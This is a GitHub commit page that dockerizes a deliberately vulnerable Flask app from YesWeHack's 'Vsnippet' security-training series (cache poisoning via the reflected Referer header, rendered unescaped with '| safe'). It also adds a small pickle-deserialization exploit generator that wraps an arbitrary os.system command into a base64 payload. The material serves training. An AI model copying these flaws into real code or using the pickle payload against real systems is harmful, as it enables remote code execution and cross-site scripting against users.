Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 2b34727

Browse files
Caache poisoning - dockerized and updated
1 parent 90f9356 commit 2b34727

File tree

8 files changed

+143
-11
lines changed

8 files changed

+143
-11
lines changed

‎CachePoisoning/1/requirements.txt‎

Lines changed: 0 additions & 2 deletions
This file was deleted.
Lines changed: 18 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,18 @@
1+
FROM python:3
2+
3+
#Install and update system dependencies
4+
RUN apt update -y; apt install -y supervisor
5+
RUN pip install flask Flask-Caching
6+
7+
#Prepare and setup the working directory
8+
RUN mkdir -p /app
9+
WORKDIR /app
10+
COPY vsnippet .
11+
COPY config/supervisord.conf /etc/supervisord.conf
12+
13+
EXPOSE 1337
14+
15+
#Disable pycache
16+
ENV PYTHONDONTWRITEBYTECODE=1
17+
18+
ENTRYPOINT [ "/usr/bin/supervisord", "-c", "/etc/supervisord.conf" ]
Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
[supervisord]
2+
user=root
3+
nodaemon=true
4+
logfile=/dev/null
5+
logfile_maxbytes=0
6+
pidfile=/run/supervisord.pid
7+
8+
[program:flask]
9+
command=python -B /app/27-cache-poisoning-classic.py
10+
stdout_logfile=/dev/stdout
11+
stdout_logfile_maxbytes=0
12+
stderr_logfile=/dev/stderr
13+
stderr_logfile_maxbytes=0
Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
version: '3.8'
2+
services:
3+
python-flask:
4+
container_name: vsnippet-cache-poisoning-classic-27
5+
build:
6+
context: .
7+
dockerfile: Dockerfile
8+
ports:
9+
- 1337:1337
Lines changed: 26 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,26 @@
1+
#!/usr/bin/python3
2+
import os, base64, pickle
3+
4+
ic = {
5+
'k': '[033円[1;32mOK033円[0m] ',
6+
'i': '[033円[1;34mINF033円[0m] ',
7+
'w': '[033円[33mWRN033円[0m] ',
8+
'f': '[033円[1;31mFAI033円[0m] ',
9+
}
10+
11+
class Exploit(object):
12+
def __reduce__(self):
13+
return (os.system,(cmd,))
14+
15+
#User input:
16+
print("Exploit 17-Vsnippet | YesWeHack")
17+
cmd = str(input(ic['i']+' Command to execute with the exploit: '))
18+
19+
#Default set cmd:
20+
if cmd in ['', ' ', '\t']:
21+
print(ic['w']+'No command default command set => whoami')
22+
cmd = 'whoami'
23+
24+
#Payload setup & verbose:
25+
payload = base64.b64encode(pickle.dumps(Exploit()))
26+
print(ic['k'], payload.decode('ascii'))
Original file line numberDiff line numberDiff line change
@@ -1,15 +1,14 @@
1-
from flask import Flask, request
1+
#!/usr/bin/python3
2+
from flask import Flask, render_template, request
23
from flask_caching import Cache
4+
from ignore.design import design
35
import datetime
4-
app = Flask(__name__)
6+
app = design.Design(Flask(__name__), __file__, 'Vsnippet #27 - Cache poisoning classic')
57

68
##
79
# YesWeHack - Vulnerable Code Snippet
810
##
911

10-
#Install: pip install -r requirements.txt
11-
#Run: python3 27-new.py
12-
1312
#Setup cache configurations:
1413
config = {
1514
"DEBUG": True,
@@ -21,15 +20,14 @@
2120
@app.route("/")
2221
@cache.cached(timeout=10)
2322
def index():
24-
2523
HTMLContent = '''
2624
<div id="cache_info">
2725
<p> The page was cached at: [%s] </p>
2826
<p> The user was redirected from: [%s] </p>
2927
</div>
3028
''' % (str(datetime.datetime.now()), str(request.headers.get("Referer")))
3129

32-
return HTMLContent
30+
return render_template('index.html', result=HTMLContent)
3331

34-
if __name__=='__main__':
35-
app.run(debug=True)
32+
if __name__=='__main__':
33+
app.run(host='0.0.0.0', port=1337, debug=True)
Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
from flask import Flask
2+
#Note : (This code is never a part of the vulnerable code snippet. It's only for design.)
3+
4+
r = '#ff0000'
5+
w = '#ffffff'
6+
g = '#00ff55'
7+
dg = '#00b33c'
8+
b = '#0052cc'
9+
p = '#cc00cc'
10+
s = '#ffcc66'
11+
12+
def Design(app:Flask, file:str, title:str, desc='') -> Flask:
13+
app.config['TITLE'] = title
14+
with open(file, 'r') as f: app.config['SOURCE_CODE'] = ''.join([i for i in f])
15+
16+
return app
17+
Lines changed: 53 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,53 @@
1+
<!DOCTYPE html>
2+
<html>
3+
<head>
4+
<title> {{ config.TITLE }} </title>
5+
</head>
6+
<body>
7+
<h1> {{ config.TITLE }} </h1>
8+
9+
<form action="/">
10+
<input type="text" name="search" placeholder="search products...">
11+
<button type="submit">search</button>
12+
</form>
13+
14+
15+
<!--Vsnippet output-->
16+
<h2> {{ result | safe }} </h2>
17+
18+
<style>
19+
@import url("https://fonts.googleapis.com/css2?family=VT323&display=swap");
20+
body {
21+
padding: 2%;
22+
font-family: "VT323", monospace;
23+
background-color: #000;
24+
color: white;
25+
}
26+
input, button {
27+
padding: 10px;
28+
background-color: rgb(10, 10, 10);
29+
border: 2px solid #09d8c4;
30+
border-radius: 10px;
31+
color: white;
32+
}
33+
#Vcode {
34+
z-index: -1;
35+
opacity: 0.8;
36+
position: absolute;
37+
transform: translate(-100%, -100%);
38+
top: 96%;
39+
left: 98%;
40+
word-wrap: break-word;
41+
padding: 2%;
42+
background-color: rgb(10, 10, 10);
43+
border: 2px solid #09d8c4;
44+
border-radius: 10px;
45+
font-size: 14px;
46+
}
47+
</style>
48+
49+
<div id="Vcode">
50+
<pre style="color:#ff8533;">{{ config.SOURCE_CODE }}</pre>
51+
</div>
52+
</body>
53+
</html>

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /